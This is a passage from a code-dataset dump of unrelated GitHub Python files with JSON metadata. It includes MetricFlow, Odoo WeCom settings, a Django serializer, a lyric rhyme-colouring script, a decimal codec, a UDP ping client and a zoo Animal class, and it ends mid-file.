\"\n f\"Got tasks: {dataflow_plan.sink_output_nodes}\"\n )\n\n execution_plan = self._to_execution_plan_converter.convert_to_execution_plan(dataflow_plan)\n\n return MetricFlowExplainResult(\n query_spec=query_spec,\n dataflow_plan=dataflow_plan,\n execution_plan=execution_plan,\n output_table=output_table,\n )\n\n @log_call(module_name=__name__, telemetry_reporter=_telemetry_reporter)\n def explain(self, mf_request: MetricFlowQueryRequest) -> MetricFlowExplainResult: # noqa: D\n return self._create_execution_plan(mf_request)\n\n def simple_dimensions_for_metrics(self, metric_names: List[str]) -> List[Dimension]: # noqa: D\n path_key_to_linkable_dimensions = (\n self._semantic_manifest_lookup.metric_lookup.linkable_set_for_metrics(\n metric_references=[MetricReference(element_name=mname) for mname in metric_names],\n without_any_property=frozenset(\n {\n LinkableElementProperties.ENTITY,\n LinkableElementProperties.DERIVED_TIME_GRANULARITY,\n LinkableElementProperties.LOCAL_LINKED,\n }\n ),\n )\n ).path_key_to_linkable_dimensions\n\n dimensions: List[Dimension] = []\n for (\n path_key,\n linkable_dimensions_tuple,\n ) in path_key_to_linkable_dimensions.items():\n for linkable_dimension in linkable_dimensions_tuple:\n semantic_model = self._semantic_manifest_lookup.semantic_model_lookup.get_by_reference(\n linkable_dimension.semantic_model_origin\n )\n assert semantic_model\n dimensions.append(\n Dimension.from_pydantic(\n pydantic_dimension=semantic_model.get_dimension(\n DimensionReference(element_name=linkable_dimension.element_name)\n ),\n path_key=path_key,\n )\n )\n return dimensions\n\n def entities_for_metrics(self, metric_names: List[str]) -> List[Entity]: # noqa: D\n path_key_to_linkable_entities = (\n self._semantic_manifest_lookup.metric_lookup.linkable_set_for_metrics(\n metric_references=[MetricReference(element_name=mname) for mname in metric_names],\n with_any_property=frozenset(\n {\n LinkableElementProperties.ENTITY,\n }\n ),\n )\n ).path_key_to_linkable_entities\n\n entities: List[Entity] = []\n for (\n path_key,\n linkable_entity_tuple,\n ) in path_key_to_linkable_entities.items():\n for linkable_entity in linkable_entity_tuple:\n semantic_model = self._semantic_manifest_lookup.semantic_model_lookup.get_by_reference(\n linkable_entity.semantic_model_origin\n )\n assert semantic_model\n entities.append(\n Entity.from_pydantic(\n pydantic_entity=semantic_model.get_entity(\n EntityReference(element_name=linkable_entity.element_name)\n )\n )\n )\n return entities\n\n @log_call(module_name=__name__, telemetry_reporter=_telemetry_reporter)\n def list_metrics(self) -> List[Metric]: # noqa: D\n metric_references = self._semantic_manifest_lookup.metric_lookup.metric_references\n metrics = self._semantic_manifest_lookup.metric_lookup.get_metrics(metric_references)\n return [\n Metric.from_pydantic(\n pydantic_metric=metric,\n dimensions=self.simple_dimensions_for_metrics([metric.name]),\n )\n for metric in metrics\n ]\n\n @log_call(module_name=__name__, telemetry_reporter=_telemetry_reporter)\n def get_dimension_values( # noqa: D\n self,\n metric_name: str,\n get_group_by_values: str,\n time_constraint_start: Optional[datetime.datetime] = None,\n time_constraint_end: Optional[datetime.datetime] = None,\n ) -> List[str]:\n # Run query\n query_result = self.query(\n MetricFlowQueryRequest.create_with_random_request_id(\n metric_names=[metric_name],\n group_by_names=[get_group_by_values],\n time_constraint_start=time_constraint_start,\n time_constraint_end=time_constraint_end,\n 
query_type=MetricFlowQueryType.DIMENSION_VALUES,\n )\n )\n result_dataframe = query_result.result_df\n if result_dataframe is None:\n return []\n return [str(val) for val in result_dataframe[get_group_by_values]]\n\n @log_call(module_name=__name__, telemetry_reporter=_telemetry_reporter)\n def explain_get_dimension_values( # noqa: D\n self,\n metric_name: str,\n get_group_by_values: str,\n time_constraint_start: Optional[datetime.datetime] = None,\n time_constraint_end: Optional[datetime.datetime] = None,\n ) -> MetricFlowExplainResult:\n return self._create_execution_plan(\n MetricFlowQueryRequest.create_with_random_request_id(\n metric_names=[metric_name],\n group_by_names=[get_group_by_values],\n time_constraint_start=time_constraint_start,\n time_constraint_end=time_constraint_end,\n query_type=MetricFlowQueryType.DIMENSION_VALUES,\n )\n )\n","repo_name":"sandeepks/metricflow","sub_path":"metricflow/engine/metricflow_engine.py","file_name":"metricflow_engine.py","file_ext":"py","file_size_in_byte":26665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"37363057048","text":"import pygame, os\r\n\r\n\r\ndef load_textures(*args):\r\n for path in args:\r\n for f, sf, files in os.walk(path):\r\n for file in files:\r\n name = file.split('.')[0]\r\n file_path = f + '\\\\' + file\r\n img = pygame.image.load(file_path)\r\n textures[name] = img\r\n\r\n\r\ntextures = {}\r\nload_textures('textures')\r\nprint(textures)","repo_name":"meabefir/pygame-oop","sub_path":"TextureLoader.py","file_name":"TextureLoader.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35858542736","text":"# -*- coding: utf-8 -*-\n\nimport datetime\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import UserError, ValidationError\nimport time\n\nfrom odoo.addons.wecom_api.api.wecom_abstract_api import ApiException\n\nimport logging\n\n_logger = logging.getLogger(__name__)\n\n\nclass ResConfigSettings(models.TransientModel):\n _inherit = \"res.config.settings\"\n\n company_id = fields.Many2one(\n \"res.company\",\n string=\"Company\",\n required=True,\n default=lambda self: self.env.company,\n )\n\n wecom_api_domain_ip = fields.Char(\n \"Wecom API Domain IP\", config_parameter=\"wecom.api_domain_ip\",\n )\n\n # 加入企微微信二维码\n contacts_join_qrcode_enabled = fields.Boolean(\n related=\"company_id.wecom_contacts_join_qrcode_enabled\", readonly=False\n )\n contacts_join_qrcode = fields.Char(\n related=\"company_id.wecom_contacts_join_qrcode\", readonly=False\n )\n contacts_join_qrcode_size_type = fields.Selection(\n related=\"company_id.wecom_contacts_join_qrcode_size_type\", readonly=False\n )\n contacts_join_qrcode_last_time = fields.Datetime(\n related=\"company_id.wecom_contacts_join_qrcode_last_time\", readonly=False\n )\n\n # 通讯录\n contacts_app_id = fields.Many2one(\n related=\"company_id.contacts_app_id\", readonly=False\n )\n\n contacts_secret = fields.Char(related=\"contacts_app_id.secret\", readonly=False)\n\n # contacts_access_token = fields.Char(related=\"contacts_app_id.access_token\")\n\n contacts_app_config_ids = fields.One2many(\n related=\"contacts_app_id.app_config_ids\", readonly=False,\n )\n\n contacts_app_callback_service_ids = fields.One2many(\n related=\"contacts_app_id.app_callback_service_ids\", readonly=False\n )\n\n module_wecom_contacts_sync = fields.Boolean(\"WeCom Contacts Synchronized\")\n\n module_wecom_material = 
fields.Boolean(\"WeCom Material\")\n module_wecom_auth_oauth = fields.Boolean(\"WeCom Authentication\")\n module_wecom_message = fields.Boolean(\"WeCom Message\")\n module_portal = fields.Boolean(\"Customer Portal\")\n module_wecom_portal = fields.Boolean(\"Wecom Portal\")\n module_wecom_msgaudit = fields.Boolean(\"Wecom Session Content Archive\")\n module_wecom_attendance = fields.Boolean(\"WeCom Attendances\")\n module_wecom_approval = fields.Boolean(\"WeCom Approvals\")\n\n def cron_get_join_qrcode(self):\n \"\"\"\n 自动任务获取加入企业二维码\n \"\"\"\n companies = self.env[\"res.company\"].search(\n [\n (\"is_wecom_organization\", \"=\", True),\n (\"wecom_contacts_join_qrcode_enabled\", \"=\", True),\n ]\n )\n for company in companies:\n _logger.info(\n _(\"Automatic task:Start to get join enterprise QR code of company [%s]\")\n % (company.name)\n )\n if not company.contacts_app_id:\n _logger.info(\n _(\"Automatic task:Please bind the contact app of company [%s]!\")\n % (company.name)\n )\n elif not company.wecom_contacts_join_qrcode_enabled:\n _logger.info(\n _(\n \"Automatic task:Please enable the company [%s] to join the enterprise wechat QR code function!\"\n )\n % (company.name)\n )\n else:\n try:\n wecomapi = self.env[\"wecom.service_api\"].InitServiceApi(\n company.corpid, company.contacts_app_id.secret\n )\n\n last_time = company.wecom_contacts_join_qrcode_last_time\n size_type = company.wecom_contacts_join_qrcode_size_type\n # 超期\n overdue = False\n if last_time:\n overdue = self.env[\n \"wecomapi.tools.datetime\"\n ].cheeck_days_overdue(last_time, 7)\n if not last_time or overdue:\n response = wecomapi.httpCall(\n self.env[\"wecom.service_api_list\"].get_server_api_call(\n \"GET_JOIN_QRCODE\"\n ),\n {\"size_type\": size_type},\n )\n if response[\"errcode\"] == 0:\n company.write(\n {\n \"wecom_contacts_join_qrcode\": response[\n \"join_qrcode\"\n ],\n \"wecom_contacts_join_qrcode_last_time\": datetime.datetime.now(),\n }\n )\n except ApiException as ex:\n error = self.env[\"wecom.service_api_error\"].get_error_by_code(\n ex.errCode\n )\n _logger.warning(\n _(\n \"Automatic task:Error in obtaining the QR code of joining company [%s],error code: %s, error name: %s, error message: %s\"\n )\n % (company.name, str(ex.errCode), error[\"name\"], ex.errMsg)\n )\n _logger.info(\n _(\n \"Automatic task:End obtaining joining enterprise QR code of company [%s]\"\n )\n % (company.name)\n )\n\n def get_join_qrcode(self):\n \"\"\"\n 获取加入企业二维码\n \"\"\"\n # self.contacts_app_id.get_join_qrcode()\n ir_config = self.env[\"ir.config_parameter\"].sudo()\n debug = ir_config.get_param(\"wecom.debug_enabled\")\n\n if not self.contacts_app_id:\n raise ValidationError(_(\"Please bind contact app!\"))\n\n if not self.contacts_join_qrcode_enabled:\n raise ValidationError(\n _(\"Please enable the function of join enterprise QR code!\")\n )\n\n if debug:\n _logger.info(\n _(\"Start getting join enterprise QR code of company [%s]\")\n % (self.company_id.name)\n )\n try:\n wecomapi = self.env[\"wecom.service_api\"].InitServiceApi(\n self.company_id.corpid, self.contacts_app_id.secret\n )\n\n last_time = self.contacts_join_qrcode_last_time\n size_type = self.contacts_join_qrcode_size_type\n # 超期\n overdue = False\n if last_time:\n overdue = self.env[\"wecomapi.tools.datetime\"].cheeck_days_overdue(\n last_time, 7\n )\n if not last_time or overdue:\n response = wecomapi.httpCall(\n self.env[\"wecom.service_api_list\"].get_server_api_call(\n \"GET_JOIN_QRCODE\"\n ),\n {\"size_type\": size_type},\n )\n if 
response[\"errcode\"] == 0:\n self.company_id.write(\n {\n \"wecom_contacts_join_qrcode\": response[\"join_qrcode\"],\n \"wecom_contacts_join_qrcode_last_time\": datetime.datetime.now(),\n }\n )\n # self.contacts_join_qrcode=response[\"join_qrcode\"]\n # self.contacts_join_qrcode_last_time = datetime.datetime.now()\n\n except ApiException as ex:\n return self.env[\"wecomapi.tools.action\"].ApiExceptionDialog(\n ex, raise_exception=True\n )\n\n finally:\n if debug:\n _logger.info(\n _(\"End getting join enterprise QR code of company [%s]\")\n % (self.company_id.name)\n )\n\n # TODO: 使用任务 获取IP\n\n def get_wecom_api_domain_ip(self):\n \"\"\"\n 获取企业微信API域名IP段\n \"\"\"\n ir_config = self.env[\"ir.config_parameter\"].sudo()\n debug = ir_config.get_param(\"wecom.debug_enabled\")\n\n if not self.contacts_app_id:\n raise ValidationError(_(\"Please bind contact app!\"))\n\n if debug:\n _logger.info(_(\"Start to get enterprise wechat API domain name IP segment\"))\n try:\n wecomapi = self.env[\"wecom.service_api\"].InitServiceApi(\n self.company_id.corpid, self.contacts_app_id.secret\n )\n\n response = wecomapi.httpCall(\n self.env[\"wecom.service_api_list\"].get_server_api_call(\n \"GET_API_DOMAIN_IP\"\n ),\n {},\n )\n if response[\"errcode\"] == 0:\n ir_config.sudo().set_param(\"wecom.api_domain_ip\", response[\"ip_list\"])\n\n except ApiException as ex:\n return self.env[\"wecomapi.tools.action\"].ApiExceptionDialog(\n ex, raise_exception=True\n )\n\n finally:\n if debug:\n _logger.info(\n _(\"End obtaining enterprise wechat API domain name IP segment\")\n )\n\n","repo_name":"rainbow-studio-solution/wecom","sub_path":"wecom_contacts/models/res_config_settings.py","file_name":"res_config_settings.py","file_ext":"py","file_size_in_byte":9233,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"35"} +{"seq_id":"27896126597","text":"from django_countries.fields import CountryField\nfrom rest_framework import serializers\nfrom .models import CarDealer\nfrom djangoTask.src.apps.Car.serializers import CarSerializer, SpecificationCarSerializer\n\n\nclass CarDealerSerializer(serializers.ModelSerializer):\n car_price = serializers.SerializerMethodField()\n car_price_with_discount = serializers.SerializerMethodField()\n count = serializers.SerializerMethodField()\n country = CountryField()\n cars = CarSerializer(many=True, required=False)\n specification = SpecificationCarSerializer(many=True, required=False)\n\n def get_car_price(self, obj):\n supplier_cars = obj.cardealercar_set.all()\n return {car.car_id: car.price for car in supplier_cars}\n\n def get_car_price_with_discount(self, obj):\n car_dealer_cars = obj.cardealercar_set.all()\n return {car.car_id: car.price_with_discount for car in car_dealer_cars}\n\n def get_count(self, obj):\n car_dealer_cars = obj.cardealercar_set.all()\n return {car.car_id: car.count for car in car_dealer_cars}\n\n class Meta:\n model = CarDealer\n fields = [\n \"id\",\n \"dealer_name\",\n \"country\",\n \"balance\",\n \"cars\",\n \"car_price\",\n \"car_price_with_discount\",\n \"count\",\n \"specification\",\n ]\n read_only_fields = [\n 'balance',\n 'cars'\n ]\n","repo_name":"Timofey1488/Django-Cars","sub_path":"djangoTask/src/apps/CarDealer/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36078278081","text":"import matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nimport 
matplotlib.colors as colors\nimport math\nimport xlrd\nimport pylab\nimport pypinyin\nimport itchat\nimport time, sys\nfrom itchat.content import TEXT\nfrom xlrd import open_workbook\nfrom matplotlib.font_manager import FontProperties\nwb1 = open_workbook('D:\\Krust\\Appone\\yunjiao.xlsx')\nsta={'2押':0}\nwb3 = open('D:\\Krust\\Appone\\geci.txt')\nwb = open_workbook('D:\\Krust\\Appone\\yanse.xlsx')\ncolor=[]\ncolornumber=20\ndef Yunjiao(a):\n global sta\n global color\n global colornumber\n global wb3\n global wb1\n global wb\n Tempt=pypinyin.pinyin(a, style=pypinyin.NORMAL)\n tempt=str(Tempt[0][0])\n ans=''\n if tempt=='a' or tempt=='o' or tempt=='e' or tempt=='ai' or tempt=='ei' or tempt=='ao' or tempt=='ou' or tempt=='ei' or tempt=='an' or tempt=='en' or tempt=='ang' or tempt=='eng' :\n ans=tempt[:]\n elif tempt=='yu' or tempt=='qu' or tempt=='ju' or tempt=='xu':\n ans='uu'\n elif tempt=='yue' or tempt=='que' or tempt=='jue' or tempt=='xue':\n ans='ue'\n elif tempt=='yun' or tempt=='qun' or tempt=='jun' or tempt=='xun':\n ans='uun'\n elif tempt=='ye':\n ans='ie'\n elif tempt[0]=='z'or tempt[0]=='c' or tempt[0]=='s':\n if len(tempt)>1 and tempt[1]=='h':\n ans=tempt[2:len(tempt)]\n if ans=='':\n ans=tempt[1:len(tempt)]\n for i in range(36):\n for ss in wb1.sheets():\n if ans==ss.cell(i,0).value:\n return int(ss.cell(i,1).value)-1\n return int(0)\ndef Multimortgage():\n global sta\n global color\n global colornumber\n global wb3\n global wb1\n global wb\n while True:\n line=wb3.readline()\n if line=='\\n':\n continue\n if not line:\n break\n #if line[len(line)-1]=='\\n':\n #line=line[0:len(line)-1]\n for i in range(len(line)):\n for s in wb.sheets():\n if line[i]=='\\n' :\n color.append(-2)\n elif line[i] > '\\u9fa5' or '\\u4e00' > line[i] or line[i]==' ':\n color.append(-1)\n else:\n color.append(Yunjiao(line[i]))\n #print(color)\n color.reverse()\n for i in range(len(color)):\n if color[i]<0:\n continue\n maxx=-1\n no=0\n for j in range(i+1,len(color)):\n if color[j]==-2:\n no=no+1\n if no>1:\n break\n continue\n if color[j]==-1:\n continue\n if color[i]==color[j]:\n tempt=0\n while True:\n if i+tempt>=len(color) or j+tempt>=len(color) or color[i+tempt]!=color[j+tempt] or i+tempt>=j or color[i+tempt]==-2 or color[j+tempt]==-2:\n break\n tempt+=1\n if tempt >=2:\n #print(i,j,tempt)\n no=no-1\n for p in range(tempt):\n if color[i]>18:\n color[j+p]=color[i]\n else:\n color[j+p]=int(colornumber)\n if maxx1:\n name=str(maxx)+'押'\n if name in sta.keys():\n sta[name]+=1\n else:\n sta[name]=1\n if color[i]<=18:\n for u in range(maxx):\n color[u+i]=int(colornumber)\n colornumber+=1\n color.reverse()\ndef yunjiao():\n global sta\n global color\n global colornumber\n global wb3\n global wb1\n global wb\n fig = plt.figure()\n ax = fig.add_subplot(111)\n startposx=0.0\n startposy=0.87\n filenum=0\n font1=FontProperties(fname='D:\\Krust\\Appone\\SimHei.ttf',size=15)\n words=0\n Multimortgage()\n #print(color)\n wb3.close()\n wb3 = open('D:\\Krust\\Appone\\geci.txt')\n while True:\n line=wb3.readline()\n if not line:\n break\n if line=='\\n':\n continue\n for i in range(len(line)):\n if line[i]=='\\n':\n words+=1\n continue\n elif line[i] > '\\u9fa5' or '\\u4e00' > line[i]:\n pylab.text(startposx+0.008,startposy+0.009, line[i], fontsize=10 ,fontproperties=font1, fontweight='bold', color='black', horizontalalignment='center')\n startposx+=0.02\n if startposx>1.0:\n startposx=0\n startposy-=0.10\n if startposy<0.05:\n pylab.savefig(\"heart3-1\"+str(filenum)+\".png\")\n filenum+=1\n fig = plt.figure()\n ax 
= fig.add_subplot(111)\n startposx=0.0\n startposy=0.87\n words+=1\n continue\n for s in wb.sheets():\n c=s.cell(int(color[words]),0).value\n words+=1\n pos = (startposx, startposy)\n ax.add_patch(patches.Rectangle(pos, 0.05, 0.07, color=c))\n ax.annotate('', xy=pos)\n pylab.text(startposx+0.025,startposy+0.009, line[i], fontsize=10 ,fontproperties=font1, fontweight='bold', color='black', horizontalalignment='center')\n startposx+=0.05\n if startposx>1.0:\n startposx=0\n startposy-=0.10\n if startposy<0.05:\n pylab.axis('off')\n pylab.savefig(\"heart3-1\"+str(filenum)+\".png\")\n filenum+=1\n fig = plt.figure()\n ax = fig.add_subplot(111)\n startposx=0.0\n startposy=0.87\n startposx=0\n startposy-=0.09\n if startposy<0.05:\n pylab.axis('off')\n pylab.savefig(\"colored_lyrics\"+str(filenum)+\".png\")\n filenum+=1\n fig = plt.figure()\n ax = fig.add_subplot(111)\n startposx=0.0\n startposy=0.87\n pylab.axis('off')\n pylab.savefig(\"colored_lyrics\"+str(filenum)+\".png\")\n filenum+=1\n fig = plt.figure()\n ax = fig.add_subplot(111)\n startpos=0.7\n for keys in sta:\n pylab.text(0.5,startpos, keys+':'+str(sta[keys]), fontsize=10 ,fontproperties=font1, fontweight='bold', color='black', horizontalalignment='center')\n startpos-=0.2\n pylab.axis('off')\n pylab.savefig(\"colored_lyrics\"+str(filenum)+\".png\")\n return int(filenum)\n #plt.show()\n","repo_name":"Stanliuu/Krust1","sub_path":"Appone/yunjiaojiancha.py","file_name":"yunjiaojiancha.py","file_ext":"py","file_size_in_byte":6962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"2296491431","text":"# Codec for python decimal.Decimal to arbitrary-precision value-and-exponent encoding.\n\nimport decimal\n\nfrom six import int2byte\n\nfrom b3.type_varint import encode_uvarint, decode_uvarint\nfrom b3.utils import IntByteAt\n\n########################################################################################################################\n# Data Format Standard\n########################################################################################################################\n\n# Goal: \"small numbers are small, big numbers are big\"\n# We call the non-exponent 'main number' the 'value'. Others call it the signficand or (sometimes wrongly-ish) mantissa.\n\n# --- Structure ---\n# [Control byte][optional exponent uvarint][value uvarint]\n# Note: the value varint is allowed to be missing if its zero. 
We dont have a presence flag for that,\n# so the decoder uses the size of what it's given (via end-index) to determine presence.\n\n# --- Control Byte ---\n# +------------+------------+------------+------------+------------+------------+------------+------------+\n# | 0:Number | Sign | Expo Sign | Ext exp(1) | exponent | exponent | exponent | exponent |\n# | 1:Special | Sign | Nan/Inf(2) | q/s nan(3) | unused | unused | unused | unused |\n# +------------+------------+------------+------------+------------+------------+------------+------------+\n# (1) 0 = exponent in bottom 4 bits, 1 = exponent varint follows\n# (2) 0 = NaN, 1 = Infinity\n# (3) 0 = 'Quiet' NaN, 1 = 'Signalling' NaN\nBIT_SPECIAL = 0x80 # 0 = Number, 1 = special\nBIT_NEGATIVE = 0x40 # 0 = +ve number, 1 = -ve number\nBIT_EXP_NEGA = 0x20 # 0 = +ve exponent, 1 = -ve exponent\nBIT_INFINITY = 0x20 # 0 = NaN, 1 = Infinit\nBIT_EXP_EXT = 0x10 # 0 = exponent is lower 4 bits of control byte, 1 = exponent is a uvarint following control byte\nBIT_SNAN = 0x10 # 0 = Quiet NaN, 1 = 'Signalling' NaN\nEXPONENT_BITS = 0x0F # Lower 4 bits of control byte\n\n# https://www.jpl.nasa.gov/edu/news/2016/3/16/how-many-decimals-of-pi-do-we-really-need/\n# @ 15dp, \"voyager 1 distance-radius circle circumference error is 1.5 inches\"\n\n\n########################################################################################################################\n# Encode\n########################################################################################################################\n\n# Note: we're not supporting compact zero-value mode in the encoder. CZV is optional for encoders so that's ok.\n\n# In: num - a decimal.Decimal type ONLY\n# Out: bytes\ndef encode_decimal(num):\n if not isinstance(num, decimal.Decimal):\n raise TypeError(\"only accepts decimal.Decimal objects\")\n\n sign, digits, exp = num.as_tuple()\n special = not num.is_finite()\n\n # --- Control bits & special values (inf, nan) ---\n bits = 0x00\n if special: # bit 4 (0x80) : 0=number, 1=special\n bits |= BIT_SPECIAL\n\n if sign: # bit 3 (0x40) : 0=+ve number, 1=-ve number\n bits |= BIT_NEGATIVE\n\n if special: # bit 2 (0x20) : [special] 0=nan 1=infinity\n if num.is_infinite():\n bits |= BIT_INFINITY\n else: # bit 2 (0x20) : [number] 0=+ve expo 1=-ve expo\n if exp < 0:\n bits |= BIT_EXP_NEGA\n\n if special: # bit 1 (0x10) : [special] 0=qnan 1=snan\n if num.is_snan():\n bits |= BIT_SNAN\n return int2byte(bits) # *** Special only, we're done ***\n\n # --- Exponent ---\n exp_abs = abs(exp)\n\n if exp_abs > 0x0F: # bit 1 (0x10) : [number] 0=expo bottom-4bits 1=expo varint follows\n bits |= 0x10 # exponent > 15, store it in varint\n out = [int2byte(bits), encode_uvarint(exp_abs)]\n # ^^ uv b/c exp sign already done & we're trying to be compact\n else: # exponent =< 15, store it in low nibble\n bits |= exp_abs & 0x0F\n out = [int2byte(bits)]\n\n # --- Value (significand) ---\n if digits:\n value = int(\"\".join(map(str, digits))) # [screaming intensifies]\n if value: # Note that 0 = no value bytes at all.\n out.append(encode_uvarint(value))\n\n return b\"\".join(out)\n\n\n########################################################################################################################\n# Decode\n########################################################################################################################\n\n# In: bytes buffer, index of our start, index of next thing's start (so index of us + size of us)\n# Out: a decimal.Decimal\ndef decode_decimal(buf, index, end):\n 
bits, index = IntByteAt(buf, index)\n\n # --- Special literals ---\n if bits & BIT_SPECIAL:\n if bits & BIT_INFINITY: # Is infinity, not a NaN\n lit = \"Inf\"\n else: # Is a NaN\n if bits & BIT_SNAN: # Is a Signalling NaN\n lit = \"sNaN\"\n else: # Is a Quiet NaN\n lit = \"NaN\"\n\n sign_lit = \"%s%s\" % (\"-\" if bits & BIT_NEGATIVE else \"\", lit)\n return decimal.Decimal(sign_lit)\n\n # --- exponent ---\n if bits & BIT_EXP_EXT: # exponent is a varint that follows\n exp, index = decode_uvarint(buf, index)\n else: # exponent is bottom half of bits byte\n exp = bits & EXPONENT_BITS\n\n # --- value ---\n if index == end: # Note: old behaviour, deprecated (handled by zero_value_table)\n value = 0\n else:\n value, index = decode_uvarint(buf, index)\n\n # Note: we cant get -0 through here if we use ints and scaleb, so using strings instead for now.\n\n dec_str = \"%s%de%s%d\" % (\n \"-\" if bits & BIT_NEGATIVE else \"\",\n value,\n \"-\" if bits & BIT_EXP_NEGA else \"\",\n exp,\n )\n # print(\"Dec str: %r\" % dec_str)\n return decimal.Decimal(dec_str)\n\n\n# decimal.Decimal(-1234).scaleb(-2) -> Decimal('-12.34') # using ints\n# decimal.Decimal('-1234e-2') -> Decimal('-12.34') # using strings\n","repo_name":"oddy/b3","sub_path":"b3/type_decimal.py","file_name":"type_decimal.py","file_ext":"py","file_size_in_byte":5886,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"35"} +{"seq_id":"39707749730","text":"import sqlite3\nimport os.path\n\nconnection = sqlite3.connect(os.path.abspath('database.db'))\nconnection.text_factory = str\n\nwith open(os.path.abspath('schema.sql')) as f:\n connection.executescript(f.read())\n \nconnection.commit()\nconnection.close()","repo_name":"yanaredkina/Website-project","sub_path":"init_db.py","file_name":"init_db.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5399519405","text":"from socket import *\nimport time\n\nserverName = '127.0.0.1'\nserverPort = 12000\nsocketClient = socket(AF_INET, SOCK_DGRAM)\nsocketClient.settimeout(1)\n\nfor i in range(0, 10):\n sendTime = time.time()\n message = ('Ping %d %s' % (i + 1, sendTime)).encode()\n try:\n socketClient.sendto(message, (serverName, serverPort))\n modifiedMessage, serverAddress = socketClient.recvfrom(1024)\n rtt = time.time() - sendTime\n print('Sequence %d: Reply from %s RTT = %.3fs' % (i+1, serverName, rtt))\n except Exception as e:\n print('Sequence %d timeout' % (i + 1))\nsocketClient.close()\n\n","repo_name":"Jocs/reading-notes","sub_path":"computer-networking-a-top-down-approach/cp2/ping_client.py","file_name":"ping_client.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"37487991403","text":"\n#Se hace la creación de la clase animal como model con sus respectivos atributos que tendra cada objeto de dicha clase para el zoológico\nclass Animal:\n def __init__(self, nombre = \"\", especieAnimal = \"\", dieta = \"\", temperatura = 0, id = 0, edad = 0, estadoSalud = 0, cantDormir = 0, cantComer = 0):\n self.nombre = nombre\n self.especieAnimal = especieAnimal\n self.dieta = dieta\n self.temperatura = temperatura\n self.id = id\n self.edad = edad\n self.estadoSalud = estadoSalud\n self.cantDormir = cantDormir\n self.cantComer = cantComer\n self.cantDormirTemporal = cantDormir\n self.cantComerTemporal = cantComer\n self.jugar = False\n\n #En este caso hacemos 
2 atributos temporales que son comer y dormir que guardaran lo mismo que el cantComer y el cantDormir,\n #pero, estos temporales nos serviran para irle restando el numero y mostrarle al usuario cuanto le queda al animal,\n #y los otros dos son fijos para que no se pierda la información del objeto animal.","repo_name":"Jeysa30/ZoologicoMaravilla","sub_path":"models/Animal.py","file_name":"Animal.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"21166190479","text":"import operator\n\nfrom Backend.Domain.TradingSystem.TypesPolicies.Purchase_Composites.purchase_leaves import PurchaseLeaf\nfrom Backend.response import Response\n\nops = {'great-than': operator.gt,\n 'less-than': operator.lt,\n 'great-equals': operator.ge,\n 'less-equals': operator.le,\n 'equals': operator.eq}\n\n\nclass UserLeafPurchaseRule(PurchaseLeaf):\n\n def __init__(self, leaf_details: dict, parent=None):\n super().__init__(leaf_details, parent)\n\n def operation(self, products_to_quantities: dict, user_age: int):\n if ops[self._comparator](user_age, self._constraint):\n return Response(True, msg=\"Purchase is permitted!\")\n return Response(False,msg=\"Purchase is not permitted!\")\n\n\nclass ProductLeafPurchaseRule(PurchaseLeaf):\n\n def __init__(self, leaf_details: dict, parent=None):\n super().__init__(leaf_details, parent)\n\n def operation(self, products_to_quantities: dict, user_age: int):\n prod_id = self._context_id\n amount_of_prod = products_to_quantities.get(prod_id)[1]\n if ops[self._comparator](amount_of_prod, self._constraint):\n return Response(True, msg=\"Purchase is permitted!\")\n return Response(False, msg=\"Purchase is not permitted!\")\n\n\nclass CategoryLeafPurchaseRule(PurchaseLeaf):\n\n def __init__(self, leaf_details: dict, parent=None):\n super().__init__(leaf_details, parent)\n\n def operation(self, products_to_quantities: dict, user_age: int):\n category = self._context_id\n amount_of_category = 0\n for product_id,(product, quantity) in products_to_quantities.items():\n if product.get_category() == category:\n amount_of_category += quantity\n\n if ops[self._comparator](amount_of_category, self._constraint):\n return Response(True, msg=\"Purchase is permitted!\")\n return Response(False, msg=\"Purchase is not permitted!\")\n\n\nclass BagLeafPurchaseRule(PurchaseLeaf):\n\n def __init__(self, leaf_details: dict, parent=None):\n super().__init__(leaf_details, parent)\n\n def operation(self, products_to_quantities: dict, user_age: int):\n cart_price = 0\n for _, (product, quantity) in products_to_quantities.items():\n cart_price += quantity * product.get_price()\n if ops[self._comparator](cart_price, self._constraint):\n return Response(True, msg=\"Purchase is permitted!\")\n return Response(False, msg=\"Purchase is not permitted!\")","repo_name":"RavidRo/TradingSystem","sub_path":"Backend/Domain/TradingSystem/TypesPolicies/Purchase_Composites/concrete_leaf.py","file_name":"concrete_leaf.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"12101283188","text":"class Solution:\r\n def strangePrinter(self, s: str) -> int:\r\n n=len(s)\r\n if not s:\r\n return 0\r\n\r\n dp=[[sys.maxsize]*n for _ in range(n)]\r\n\r\n for i in range(n):\r\n dp[i][i]=1\r\n\r\n for l in range(2,n+1):\r\n for i in range(n-l+1):\r\n j=i+l-1\r\n dp[i][j]=dp[i+1][j]+1\r\n\r\n for k in range(i+1,j+1):\r\n if 
